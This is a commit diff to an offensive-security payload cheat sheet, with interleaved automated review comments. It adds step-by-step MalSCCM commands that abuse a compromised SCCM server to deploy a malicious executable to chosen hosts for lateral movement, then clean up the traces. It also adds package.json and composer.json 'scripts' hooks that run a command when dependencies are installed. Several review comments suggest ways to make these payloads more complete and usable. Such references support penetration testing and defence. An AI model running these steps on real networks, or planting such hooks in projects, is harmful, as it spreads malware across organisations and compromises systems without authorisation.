mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-12-19 19:06:12 +00:00

SCCM deployment + JSON uploads

parent 33ea0b54fb
commit 67457ec582
@ -105,6 +105,7 @@
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Kerberos Resource Based Constrained Delegation](#kerberos-resource-based-constrained-delegation)
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
- [Kerberos Bronze Bit Attack - CVE-2020-17049](#kerberos-bronze-bit-attack---cve-2020-17049)
- [PrivExchange attack](#privexchange-attack)
- [PrivExchange attack](#privexchange-attack)
- [SCCM Deployment](#sccm-deployment)
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
- [RODC - Read Only Domain Controller Compromise](#rodc---read-only-domain-controller-compromise)
- [PXE Boot image attack](#pxe-boot-image-attack)
- [PXE Boot image attack](#pxe-boot-image-attack)
- [DSRM Credentials](#dsrm-credentials)
- [DSRM Credentials](#dsrm-credentials)
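Review bot: the new TOC entry `- [SCCM Deployment](#sccm-deployment)` sits between PrivExchange and RODC, which matches where the `### SCCM Deployment` heading is inserted in the body below, so the anchor resolves; keep the two in sync if the section is renamed. Style point: the neighbouring entries name an attack (`PXE Boot image attack`, `RODC - Read Only Domain Controller Compromise`), while `SCCM Deployment` reads like a product feature. Consider `SCCM - Malicious Application Deployment` (and the matching heading) so the TOC tells the reader what is being abused.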
@ -3238,6 +3239,63 @@ python Exchange2domain.py -ah attackterip -ap listenport -u user -p password -d
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
python Exchange2domain.py -ah attackterip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip
```
```
### SCCM Deployment
> SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation.
* [PowerSCCM - PowerShell module to interact with SCCM deployments](https://github.com/PowerShellMafia/PowerSCCM)
* [MalSCCM - Abuse local or remote SCCM servers to deploy malicious applications to hosts they manage](https://github.com/nettitude/MalSCCM)
* Compromise client, use locate to find management server
```ps1
MalSCCM.exe locate
```
* Enumerate over WMI as an administrator of the Distribution Point
```ps1
MalSCCM.exe inspect /server:<DistributionPoint Server FQDN> /groups
```
* Compromise management server, use locate to find primary server
* use Inspect on primary server to view who you can target
```ps1
MalSCCM.exe inspect /all
MalSCCM.exe inspect /computers
MalSCCM.exe inspect /primaryusers
MalSCCM.exe inspect /groups
```
* Create a new device group for the machines you want to laterally move too
```ps1
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
MalSCCM.exe inspect /groups
```
* Add your targets into the new group
```ps1
MalSCCM.exe group /addhost /groupname:TargetGroup /host:WIN2016-SQL
```
* Create an application pointing to a malicious EXE on a world readable share : `SCCMContentLib$`
```ps1
MalSCCM.exe app /create /name:demoapp /uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"
MalSCCM.exe inspect /applications
```
* Deploy the application to the target group
```ps1
MalSCCM.exe app /deploy /name:demoapp /groupname:TargetGroup /assignmentname:demodeployment
MalSCCM.exe inspect /deployments
```
* Force the target group to checkin for updates
```ps1
MalSCCM.exe checkin /groupname:TargetGroup
```
* Cleanup the application, deployment and group
```ps1
MalSCCM.exe app /cleanup /name:demoapp
MalSCCM.exe group /delete /groupname:TargetGroup
```
### RODC - Read Only Domain Controller Compromise
### RODC - Read Only Domain Controller Compromise
> If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username.
> If the user is included in the **Allowed RODC Password Replication**, their credentials are stored in the server, and the **msDS-RevealedList** attribute of the RODC is populated with the username.
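Review bot: the section never states its prerequisite, yet every step after `MalSCCM.exe locate` assumes administrative rights on an SCCM server: the second bullet itself says "as an administrator of the Distribution Point" and the third opens with "Compromise management server". Add that up front (e.g. "Requires local administrator on the SCCM site server; the deployed application is then pushed to every host in the target group") so nobody reads this as a low-privilege path. The intro line "SCCM is a solution from Microsoft to enhance administration in a scalable way across an organisation" should name the product (System Center Configuration Manager, now Microsoft Endpoint Configuration Manager) and say the one thing that matters here, that it deploys software to the clients it manages. Typos: "laterally move too" -> "laterally move to", "checkin" -> "check in". The `/uncpath:"\\BLORE-SCCM\SCCMContentLib$\localthread.exe"` example carries a lab hostname and payload name; use placeholders in the `<DistributionPoint Server FQDN>` form already used for `/server:`, and say explicitly that the EXE has to be copied to that share first. Last, the cleanup bullet promises removal of "the application, deployment and group" but the block only runs `app /cleanup` and `group /delete`; state that `/cleanup` also removes the deployment, or add the command that does.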
@ -3585,4 +3643,5 @@ CME 10.XXX.XXX.XXX:445 HOSTNAME-01 [+] DOMAIN\COMPUTER$ 31d6cfe0d16ae
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
* [The Kerberos Key List Attack: The return of the Read Only Domain Controllers - Leandro Cuozzo](https://www.secureauth.com/blog/the-kerberos-key-list-attack-the-return-of-the-read-only-domain-controllers/)
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
* [AD CS: weaponizing the ESC7 attack - Kurosh Dabbagh - 26 January, 2022](https://www.blackarrow.net/adcs-weaponizing-esc7-attack/)
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
* [AD CS: from ManageCA to RCE - 11 February, 2022 - Pablo Martínez, Kurosh Dabbagh](https://www.blackarrow.net/ad-cs-from-manageca-to-rce/)
* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
* [Introducing the Golden GMSA Attack - YUVAL GORDON - March 01, 2022](https://www.semperis.com/blog/golden-gmsa-attack/)
* [Introducing MalSCCM - Phil Keeble -May 4, 2022](https://labs.nettitude.com/blog/introducing-malsccm/)
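Review bot: the new reference `* [Introducing MalSCCM - Phil Keeble -May 4, 2022]` drops the space after the second hyphen; the surrounding entries separate author and date with ` - ` (e.g. `- Kurosh Dabbagh - 26 January, 2022`), so write `Phil Keeble - May 4, 2022`.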
@ -96,8 +96,9 @@ Valid pictures hosting PHP code. Upload the picture and use a local file inclusi
### Configuration Files
### Configuration Files
If you are trying to upload files to a PHP server, take a look at the .htaccess trick to execute code.
If you are trying to upload files to a :
If you are trying to upload files to an ASP server, take a look at the .config trick to execute code.
- PHP server, take a look at the .htaccess trick to execute code.
- ASP server, take a look at the .config trick to execute code.
Configuration files examples
Configuration files examples
- .htaccess
- .htaccess
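Review bot: the new lead line `If you are trying to upload files to a :` has a stray space before the colon and dangles as a sentence; write `If you are trying to upload files to a:` or, clearer, `Depending on the target server:`. Make the two bullets parallel as well, e.g. `- PHP server: use the .htaccess trick to execute code.` and `- ASP server: use the .config trick to execute code.`, so the list reads as one construction rather than two half sentences. While here, the unchanged context line `Configuration files examples` should be `Configuration file examples`.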
@ -105,6 +106,21 @@ Configuration files examples
- httpd.conf
- httpd.conf
- \_\_init\_\_.py
- \_\_init\_\_.py
Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.
- package.json
```js
"scripts": {
"prepare" : "/bin/touch /tmp/pwned.txt"
}
```
- composer.json
```js
"scripts": {
"pre-command-run" : [
"/bin/touch /tmp/pwned.txt"
]
}
```
### CVE - Image Tragik
### CVE - Image Tragik
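Review bot: `Alternatively you may be able to upload a JSON file with a custom scripts, try to overwrite a dependency manager configuration file.` has a number error ("a custom scripts") and a comma splice; suggest `Alternatively, if the upload lets you overwrite a dependency manager configuration file, its scripts hooks run the next time dependencies are installed:`. Both fences are tagged ```js but contain JSON, and as written they are fragments (no enclosing `{ }`, no `name`/`version`), so anyone who pastes them into package.json or composer.json gets a parse error; tag them ```json and show a minimal complete file, e.g. `{ "name": "x", "version": "1.0.0", "scripts": { "prepare": "/bin/touch /tmp/pwned.txt" } }`. It would also help to say when each hook fires: npm runs `prepare` on a plain `npm install` in the package directory and before `npm publish`; for Composer the example uses `pre-command-run`, so mention the command events readers will recognise for `composer install`/`composer update` as well (`pre-install-cmd`, `post-install-cmd`, `pre-update-cmd`, `post-update-cmd`).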